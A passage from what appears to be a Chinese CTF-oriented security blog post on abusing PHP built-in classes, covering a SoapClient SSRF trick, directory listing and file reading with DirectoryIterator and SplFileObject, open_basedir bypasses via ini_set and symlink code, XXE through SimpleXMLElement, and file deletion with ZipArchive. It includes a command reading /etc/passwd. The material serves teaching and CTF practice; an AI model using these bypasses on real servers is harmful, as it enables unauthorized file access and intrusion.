<span class="token function">call_user_func</span><span class="token punctuation">(</span><span class="token variable">$b</span><span class="token punctuation">,</span> <span class="token variable">$a</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
</blockquote>
<p>我们需要触发session对象的<code>__call()</code>方法，而且<code>call_user_func()</code>函数有一个特性就是：如果传入的是一个数组的话，会将数组的第一个参数当作类名，第二个参数当作函数名</p>
<p>所以我们可以通过<code>extract()</code>函数将变量b覆盖为<code>call_user_func</code>这样就变成了<code>call_user_func(call_user_func, array(reset($SESSION), &#39;welcome_to_the_lctf2018&#39;))</code>，这样就会触发<code>__call()</code>这个魔术方法，进而实现SSRF</p>
<p><img src="15.png" loading="lazy"></p>
<p>成功触发了<code>__call()</code>方法</p>
<p>之后我们传入PHPSESSIONID值，利用<code>var_dump($_SESSION)</code>来得到flag的值</p>
<p><img src="PHP%E5%86%85%E7%BD%AE%E7%B1%BB/16.png" alt="a" loading="lazy"></p>
<h3 id="绕过open-basedir"><a href="#绕过open-basedir" class="headerlink" title="绕过open_basedir"></a>绕过open_basedir</h3><h5 id="使用DirectoryIterator类目录遍历"><a href="#使用DirectoryIterator类目录遍历" class="headerlink" title="使用DirectoryIterator类目录遍历"></a>使用DirectoryIterator类目录遍历</h5><p><code>DirectoryIterator原生类</code>中有一个魔术方法<code>__toString()</code>，触发这个方法将会返回这个迭代器的第一项</p>
<h6 id="测试"><a href="#测试" class="headerlink" title="测试"></a>测试</h6><pre class="line-numbers language-php" data-language="php"><code class="language-php">//test.php
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$a</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'a'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token variable">$b</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'b'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token keyword">new</span> <span class="token variable">$a</span><span class="token punctuation">(</span><span class="token variable">$b</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">//触发__toString方法</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>GET传参<code>a=DirectoryIterator&amp;b=.</code></p>
<p>结果如下</p>
<p><img src="17.png" loading="lazy"></p>
<p>如果这时候配合上<code>glob://</code>伪协议</p>
<ul>
<li>支持通配符 ? *</li>
<li>支持正则匹配 [a-z]</li>
</ul>
<p>结果如下</p>
<p><img src="18.png" loading="lazy"></p>
<p>当然，不止一个test开头的文件，他只是返回了第一个文件</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php">//test.php
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$dir</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'cmd'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token variable">$a</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">DirectoryIterator</span><span class="token punctuation">(</span><span class="token variable">$dir</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">foreach</span><span class="token punctuation">(</span><span class="token variable">$a</span> <span class="token keyword">as</span> <span class="token variable">$f</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
    <span class="token keyword">echo</span> <span class="token punctuation">(</span><span class="token variable">$f</span><span class="token operator">-></span><span class="token function">__toString</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">.</span><span class="token string single-quoted-string">'&lt;BR>'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token comment"># payload一句话的形式:</span>
<span class="token comment"># $a = new DirectoryIterator("glob:///*");foreach($a as $f)&#123;echo($f->__toString().'&lt;br>');&#125;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>通过迭代，可以遍历文件</p>
<p><img src="19.png" loading="lazy"></p>
<h5 id="使用FilesystemIterator类目录遍历"><a href="#使用FilesystemIterator类目录遍历" class="headerlink" title="使用FilesystemIterator类目录遍历"></a>使用FilesystemIterator类目录遍历</h5><h6 id="用法"><a href="#用法" class="headerlink" title="用法"></a>用法</h6><p>和上面的用法类似</p>
<h5 id="使用GlobIterator类目录遍历"><a href="#使用GlobIterator类目录遍历" class="headerlink" title="使用GlobIterator类目录遍历"></a>使用GlobIterator类目录遍历</h5><h6 id="用法-1"><a href="#用法-1" class="headerlink" title="用法"></a>用法</h6><p>这个原生类是自带<code>glob</code>的，所以，我们只需要传入glob协议后面的内容就可以了</p>
<h5 id="使用SplFileObject类读取文件"><a href="#使用SplFileObject类读取文件" class="headerlink" title="使用SplFileObject类读取文件"></a>使用SplFileObject类读取文件</h5><h6 id="测试-1"><a href="#测试-1" class="headerlink" title="测试"></a>测试</h6><pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$a</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'a'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token variable">$b</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'b'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token keyword">new</span> <span class="token variable">$a</span><span class="token punctuation">(</span><span class="token variable">$b</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>GET传参<code>a=SplFileObject&amp;b=test.html</code></p>
<p><img src="20.png" loading="lazy"><br>test.html内容为<br><img src="21.png" loading="lazy"><br>我们发现只读取了第一行的内容</p>
<p>这个类的构造函数传入的是一个文件名，想到可以使用php伪协议</p>
<p><img src="22.png" loading="lazy"></p>
<p>成功使用伪协议读取文件内容</p>
<p><img src="23.png" alt="nicea" loading="lazy"></p>
<h5 id="非原生类读取open-basedir限制文件"><a href="#非原生类读取open-basedir限制文件" class="headerlink" title="非原生类读取open_basedir限制文件"></a>非原生类读取open_basedir限制文件</h5><h6 id="ini-set-相对路径读取"><a href="#ini-set-相对路径读取" class="headerlink" title="ini_set() + 相对路径读取"></a>ini_set() + 相对路径读取</h6><p>由于open_basedir自身的问题，设置为相对路径<code>..</code>在解析的时候会致使自身向上跳转一层</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
	<span class="token function">show_source</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">print_r</span><span class="token punctuation">(</span><span class="token function">ini_get</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'open_basedir'</span><span class="token punctuation">)</span><span class="token operator">.</span><span class="token string single-quoted-string">'&lt;br>'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	
	<span class="token function">mkdir</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'test'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">chdir</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'test'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">ini_set</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'open_basedir'</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'..'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">chdir</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'..'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">chdir</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'..'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">chdir</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'..'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">ini_set</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'open_basedir'</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'/'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	
	<span class="token keyword">echo</span> <span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'/etc/hosts'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>



<p>若open_basedir限定到了当前目录，就需要新建子目录，进入设置其为..，若已经是open_basedir的子目录就不需要，因为限定到了当前目录再设置为..就会出错。之后每次引用路径就会触发open_basedir判别，而在解析open_basedir的时候会拼接上..，从而引发open_basedir自身向上跳一级，最后跳到了根目录，再将open_basedir设置到根目录即可</p>
<h6 id="shell命令执行读取文件操作"><a href="#shell命令执行读取文件操作" class="headerlink" title="shell命令执行读取文件操作"></a>shell命令执行读取文件操作</h6><blockquote>
<p>cat /etc/passwd</p>
</blockquote>
<h6 id="symlink-软链接"><a href="#symlink-软链接" class="headerlink" title="symlink()软链接"></a>symlink()软链接</h6><p>当前路径是<code>/www/wwwroot/default</code>，<strong>新建目录数量=需要上跳次数+1</strong></p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
    <span class="token function">show_source</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    
    <span class="token function">mkdir</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"1"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token function">chdir</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"1"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">mkdir</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"2"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token function">chdir</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"2"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">mkdir</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"3"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token function">chdir</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"3"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">mkdir</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"4"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token function">chdir</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"4"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    
    <span class="token function">chdir</span><span class="token punctuation">(</span><span class="token string double-quoted-string">".."</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token function">chdir</span><span class="token punctuation">(</span><span class="token string double-quoted-string">".."</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token function">chdir</span><span class="token punctuation">(</span><span class="token string double-quoted-string">".."</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token function">chdir</span><span class="token punctuation">(</span><span class="token string double-quoted-string">".."</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    
    <span class="token function">symlink</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"1/2/3/4"</span><span class="token punctuation">,</span><span class="token string double-quoted-string">"tmplink"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">symlink</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"tmplink/../../../../etc/hosts"</span><span class="token punctuation">,</span><span class="token string double-quoted-string">"bypass"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">unlink</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"tmplink"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">mkdir</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"tmplink"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">echo</span> <span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"bypass"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>symlink会生成一个快捷方式，首先明确需要上跳三次，建四个目录，然后生成软连接symlink(“1/2/3/4”,”tmplink”)，然后再生成symlink(“tmplink/../../../../etc/hosts”,”bypass”);，化简一下也就是etc/hosts，在当前目录下，因此通过了open_basedir创建成功</p>
<p>之后，把软连接tmplink换成文件夹tmplink，变成了/www/wwwroot/default/tmplink/../../../../etc/hosts，化简就是/etc/hosts</p>
<p>关键就在于软连接中相对路径的转换是不区分类型，用文件夹顶替了软连接</p>
<h3 id="XXE漏洞利用"><a href="#XXE漏洞利用" class="headerlink" title="XXE漏洞利用"></a>XXE漏洞利用</h3><h5 id="SimpleXMLElement"><a href="#SimpleXMLElement" class="headerlink" title="SimpleXMLElement"></a>SimpleXMLElement</h5><p>PHP 5, PHP 7, PHP 8</p>
<p>构造函数</p>
<blockquote>
<p>public SimpleXMLElement::__construct(<br>string <code>$data</code>,<br>int <code>$options</code> = 0,<br>bool <code>$dataIsURL</code> = <strong><code>false</code></strong>,<br>string <code>$namespaceOrPrefix</code> = “”,<br>bool <code>$isPrefix</code> = <strong><code>false</code></strong><br>)</p>
</blockquote>
<p>data为xml格式的字符串，也可以是外部的url，我们设置data_is_url为true就可以使用url方法</p>
<h3 id="删除文件利用"><a href="#删除文件利用" class="headerlink" title="删除文件利用"></a>删除文件利用</h3><h5 id="利用ZipArchive类进行删除"><a href="#利用ZipArchive类进行删除" class="headerlink" title="利用ZipArchive类进行删除"></a>利用ZipArchive类进行删除</h5><p>php5.20之后</p>
<p>这个类有一个<code>open</code>方法</p>
<blockquote>
<p>ZipArchive::open(string $filename, int $flags=0)</p>
</blockquote>
<h6 id="参数解释"><a href="#参数解释" class="headerlink" title="参数解释"></a>参数解释</h6><p>filename: 要打开的zip文件名</p>
<p>flags: 打开模式:</p>
<ul>
<li><code>ZipArchive::OVERWRITE</code>：总是以一个新的压缩包开始，此模式下如果已经存在则会被覆盖或删除。</li>
<li><code>ZipArchive::CREATE</code>：如果不存在则创建一个zip压缩包。</li>
<li><code>ZipArchive::RDONLY</code>：只读模式打开压缩包。</li>
<li><code>ZipArchive::EXCL</code>：如果压缩包已经存在，则出错。</li>
<li><code>ZipArchive::CHECKCONS</code>：对压缩包执行额外的一致性检查，如果失败则显示错误。</li>
</ul>
<p>如果设置flags参数的值为 <code>ZipArchive::OVERWRITE</code> 的话，可以把指定文件删除。</p>
<p>这里flags同样可以使用<code>8</code>来表示<code>ZipArchive::OVERITE</code></p>
<h3 id="Reflection的妙用"><a href="#Reflection的妙用" class="headerlink" title="Reflection的妙用"></a>Reflection的妙用</h3><p>利用反射类得到已知类的方法和信息<br><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/book.reflection.php">Reflection类的使用</a></p>
<h3 id="未完待续……………………"><a href="#未完待续……………………" class="headerlink" title="未完待续……………………"></a>未完待续……………………</h3></div><div id="reward-container"><span class="hty-icon-button button-glow" id="reward-button" title="Donate" onclick="var qr = document.getElementById(&quot;qr&quot;); qr.style.display = (qr.style.display === &quot;none&quot;) ? &quot;block&quot; : &quot;none&quot;;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hand-coin-line"></use></svg></span><div id="reward-comment">I'm so cute. Please give me money.</div><div id="qr" style="display:none;"><div style="display:inline-block"><a target="_blank" rel="noopener" href="https://my-wsl.oss-cn-chengdu.aliyuncs.com/imgs/B01E5F9A0F70645FFD7D980FB6243619.jpg"><img loading="lazy" src="https://my-wsl.oss-cn-chengdu.aliyuncs.com/imgs/B01E5F9A0F70645FFD7D980FB6243619.jpg" alt="支付宝" title="支付宝"></a><div><span style="color:#00A3EE"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-alipay-line"></use></svg></span></div></div><div style="display:inline-block"><a target="_blank" rel="noopener" href="https://my-wsl.oss-cn-chengdu.aliyuncs.com/imgs/D4AD9FA7BDA95604D2919F414577B0BA.png"><img loading="lazy" src="https://my-wsl.oss-cn-chengdu.aliyuncs.com/imgs/D4AD9FA7BDA95604D2919F414577B0BA.png" alt="QQ 支付" title="QQ 支付"></a><div><span style="color:#12B7F5"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qq-line"></use></svg></span></div></div><div style="display:inline-block"><a target="_blank" rel="noopener" href="https://my-wsl.oss-cn-chengdu.aliyuncs.com/imgs/E8775427D2C8BC65C9AC73AE4CE5A3D8.jpg"><img loading="lazy" src="https://my-wsl.oss-cn-chengdu.aliyuncs.com/imgs/E8775427D2C8BC65C9AC73AE4CE5A3D8.jpg" alt="微信支付" title="微信支付"></a><div><span style="color:#2DC100"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-wechat-pay-line"></use></svg></span></div></div></div></div><ul class="post-copyright"><li class="post-copyright-author"><strong>Post author: </strong>RoboTerh</li><li class="post-copyright-link"><strong>Post link: </strong><a href="https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/" title="PHP内置类">https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/</a></li><li class="post-copyright-license"><strong>Copyright Notice: </strong>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><svg class="icon"><use xlink:href="#icon-creative-commons-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-by-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-nc-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-sa-line"></use></svg></a> unless otherwise stated.</li></ul><script>document.addEventListener('copy', function (event) {
  const clipboardData = event.clipboardData || window.clipboardData;
  if (!clipboardData) { return; }
  const text = window.getSelection().toString();
  if (text) {
    event.preventDefault();
    clipboardData.setData('text/plain', text + '\n\nPost author: RoboTerh\nPost link: https://roboterh.github.io/2021/12/03/PHP%E5%86%85%E7%BD%AE%E7%B1%BB/\nCopyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.');
  }
});</script></section></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/2021/12/06/RCTF2020-calc%E5%A4%8D%E7%8E%B0/" rel="prev" title="RCTF2020 calc复现"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-left-s-line"></use></svg><span class="post-nav-text">RCTF2020 calc复现</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/2021/11/28/PHP-FPM%E6%94%BB%E5%87%BB%E6%96%B9%E5%BC%8F/" rel="next" title="PHP-FPM攻击方式"><span class="post-nav-text">PHP-FPM攻击方式</span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-right-s-line"></use></svg></a></div></div></div><div class="hty-card" id="comment"><div class="comment-tooltip text-center"><span>要不要和我说些什么？</span><br></div></div></main><footer class="sidebar-translate" id="footer"><div class="copyright"><span>&copy; 2019 – 2022 </span><span class="with-love" id="animate"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-cloud-line"></use></svg></span><span class="author"> RoboTerh</span></div><div class="powered"><span>Powered by <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> v5.4.0</span><span class="footer-separator">|</span><span>Theme - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.7.0</span></div></footer><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-up-s-line"></use></svg><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#0078E7" stroke-width="2" stroke-linecap="round"></circle></svg></a></div></body></html>